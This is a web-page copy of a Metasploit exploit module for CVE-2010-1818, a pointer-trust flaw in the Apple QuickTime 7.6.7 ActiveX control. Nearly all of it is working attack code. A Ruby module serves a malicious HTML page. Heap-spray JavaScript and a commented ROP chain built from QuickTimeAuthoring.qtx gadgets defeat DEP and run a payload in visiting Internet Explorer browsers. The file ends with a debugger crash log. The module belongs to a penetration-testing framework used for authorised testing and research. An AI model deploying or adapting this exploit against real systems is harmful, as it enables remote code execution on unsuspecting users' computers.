Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::Seh

11


12
  # include Msf::Exploit::Remote::BrowserAutopwn

13
  # autopwn_info({

14
  #  :os_name => OperatingSystems::Match::WINDOWS,

15
  #  :ua_name    => HttpClients::IE,

16
  #  :javascript => true,

17
  #  :rank       => NormalRanking, # reliable memory corruption

18
  # })

19


20
  def initialize(info = {})

21
    super(

22
      update_info(

23
        info,

24
        'Name' => 'Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution',

25
        'Description' => %q{

26
          This module exploits a memory trust issue in Apple QuickTime

27
          7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX

28
          control will treat a supplied parameter as a trusted pointer. It will

29
          then use it as a COM-type pUnknown and lead to arbitrary code execution.

30


31
          This exploit utilizes a combination of heap spraying and the

32
          QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not

33
          opt-in to ASLR. As such, this module should be reliable on all Windows

34
          versions.

35


36
          NOTE: The addresses may need to be adjusted for older versions of QuickTime.

37
        },

38
        'Author' => [

39
          'Ruben Santemarta', # original discovery

40
          'jduck' # Metasploit module

41
        ],

42
        'License' => MSF_LICENSE,

43
        'References' => [

44
          [ 'CVE', '2010-1818' ],

45
          [ 'OSVDB', '67705'],

46
          [ 'URL', 'http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1' ]

47
        ],

48
        'DefaultOptions' => {

49
          'EXITFUNC' => 'thread',

50
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',

51
        },

52
        'Payload' => {

53
          'Space' => 384, # perhaps more?

54
          'BadChars' => "", # none...

55
          'DisableNops' => true,

56
          'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "mov esp,ebp").encode_string, # fix esp up

57
        },

58
        'Platform' => 'win',

59
        'Targets' => [

60
          # Tested OK:

61
          #

62
          # QT 7.6.6 + XP SP3 + IE8

63
          # QT 7.6.7 + XP SP3 + IE6

64
          #

65


66
          # @eromang reports it doesn't work on 7.6.5

67
          # - further investigation shows QuickTimeAuthoring.qtx changed / rop gadgets different

68


69
          # QuickTimeAuthoring.qtx 7.6.7 is compiled w/DYNAMIC_BASE, so win7 is :(

70


71
          [

72
            'Apple QuickTime Player 7.6.6 and 7.6.7 on Windows XP SP3',

73
            {

74
              'Ret' => 0x677a0000, # base of QuickTimeAuthoring.qtx

75
              # 'Ret' => 0x67780000, # base of QuickTimeAuthoring.qtx v7.6.5

76
            }

77
          ],

78
        ],

79
        'Privileged' => false,

80
        'DisclosureDate' => '2010-08-30',

81
        'DefaultTarget' => 0,

82
        'Notes' => {

83
          'Reliability' => UNKNOWN_RELIABILITY,

84
          'Stability' => UNKNOWN_STABILITY,

85
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

86
        }

87
      )

88
    )

89
  end

90


91
  def on_request_uri(client, request)

92
    return if ((p = regenerate_payload(client)) == nil)

93


94
    print_status("Sending exploit HTML...")

95


96
    shellcode = Rex::Text.to_unescape(p.encoded)

97


98
    # We will spray to this address, hopefully

99
    spray_target = 0x15220c20

100


101
    # This is where our happy little dll is loaded

102
    # 677a0000 679ce000   QuickTimeAuthoring C:\Program Files\QuickTime\QTSystem\QuickTimeAuthoring.qtx

103
    rop_mod_base = target.ret

104


105
    sploit = [

106
      spray_target - 8,

107


108
      # This first piece of code points the stack pointer to our data!

109
      # NOTE: eax, ecx, and esi all point to our spray at this point.

110
      rop_mod_base + 0x79c12, # xchg eax,esp / pop edi / pop esi / ret

111


112
      # The second one becomes the new program counter after stack flip.

113
      rop_mod_base + 0x1e27, # pop ecx / ret

114
      rop_mod_base + 0x170088, # the IAT addr for HeapCreate (becomes ecx)

115


116
      # We get the address of HeapCreate from the IAT here.

117
      rop_mod_base + 0x10244, # mov eax,[ecx] / ret

118


119
      # Call HeapCreate to create the k-rad segment

120
      rop_mod_base + 0x509e, # call eax

121
      0x01040110, # flOptions (gets & with 0x40005)

122
      0x01010101, # dwInitialSize

123
      0x01010101, # dwMaximumSize

124


125
      # Don't bother calling HeapAlloc, just add 0x8000 to the Heap Base

126


127
      # Set ebx to our adjustment

128
      rop_mod_base + 0x307a, # pop ebx / ret

129
      0x8000, # becomes ebx

130


131
      # Adjust eax

132
      rop_mod_base + 0xbfb5b, # add eax,ebx / ret

133


134
      # Save our buffer pointer off to this address

135
      rop_mod_base + 0x1e27, # pop ecx / ret

136
      rop_mod_base + 0x2062d4, # something writable

137


138
      # Write eax to the address

139
      rop_mod_base + 0x8fd6, # mov [ecx], eax / ret

140


141
      # Now we must copy our real payload into the buffer

142


143
      # First, setup edi

144
      rop_mod_base + 0x134fd5, # xchg eax,edi / ret

145


146
      # Get ESI from EDI (which is now in EAX)

147
      rop_mod_base + 0x103ff8, # push eax / pop esi / pop ebx / ret

148
      0x41414141, # scratch (becomes ebx)

149


150
      # Set ECX from the stack

151
      rop_mod_base + 0x1e27, # pop ecx / ret

152
      0x200 / 4, # dwords to copy :)

153


154
      # copy it!

155
      rop_mod_base + 0x778d2, # rep movsd / pop edi / pop esi / ret

156
      0x41414141, # scratch (becomes edi)

157
      0x41414141, # scratch (becomes esi)

158


159
      # Re-load the buffer pointer address

160
      rop_mod_base + 0x1e27, # pop ecx / ret

161
      rop_mod_base + 0x2062d4, # something writable

162


163
      # And the pointer value itself

164
      rop_mod_base + 0x10244, # mov eax,[ecx] / ret

165


166
      # Set ebx to our adjustment

167
      rop_mod_base + 0x307a, # pop ebx / ret

168
      0x42424242, # will be filled after array init

169


170
      # Adjust eax

171
      rop_mod_base + 0xbfb5b, # add eax,ebx / ret

172


173
      # Jump!

174
      rop_mod_base + 0x509e, # call eax

175


176
      # eh? Hopefull we didn't reach here.

177
      0xdeadbeef

178
    ]

179
    sploit[27] = 8 + (sploit.length * 4)

180
    sploit = sploit.pack('V*')

181
    sploit << p.encoded

182
    sploit = Rex::Text.to_unescape(sploit)

183


184
    custom_js = <<~EOF

185
      function Prepare()

186
      {

187
        var block = unescape("#{sploit}");

188
        while(block.length < 0x200)

189
          block += unescape("%u0000");

190
        heap = new heapLib.ie(0x20000);

191
        while(block.length < 0x80000)

192
          block += block;

193
        finalspray = block.substring(2, 0x80000 - 0x21);

194
        for(var i = 0; i < 350; i++)

195
        {

196
        heap.alloc(finalspray);

197
        }

198
      }

199


200
      function start()

201
      {

202
        var obj = '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"'+'>'

203
          + '</'+ 'object>';

204
        document.getElementById('stb').innerHTML = obj;

205
        Prepare();

206
        var targ = #{spray_target};

207
        var obj = '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"' + '>'

208
          + '<' + 'PARAM name="_Marshaled_pUnk" value="' + targ + '"' + '/>'

209
          + '</'+ 'object>';

210
        document.getElementById('xpl').innerHTML = obj;

211
      }

212
    EOF

213


214
    hl_js = heaplib(custom_js)

215


216
    content = <<~EOF

217
      <html>

218
      <head>

219
      <script language="javascript">

220
      #{hl_js}

221
      </script>

222
      </head>

223
      <body onload="start()">

224
      <div id="stb"></div>

225
      <div id="xpl"></div>

226
      </body>

227
      </html>

228
    EOF

229


230
    # ..

231
    send_response(client, content, { 'Content-Type' => "text/html" })

232


233
    # Handle the payload

234
    handler(client)

235
  end

236
end

237


238
=begin

239
(7fc.a4): Access violation - code c0000005 (first chance)

240
First chance exceptions are reported before any exception handling.

241
This exception may be expected and handled.

242
eax=15220c20 ebx=00134ca8 ecx=15220c18 edx=00134b98 esi=15220c20 edi=00134bfc

243
eip=deadbe01 esp=00134b7c ebp=00134b90 iopl=0         nv up ei pl nz na po nc

244
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202

245
deadbe01 ??              ???

246
=end

247


248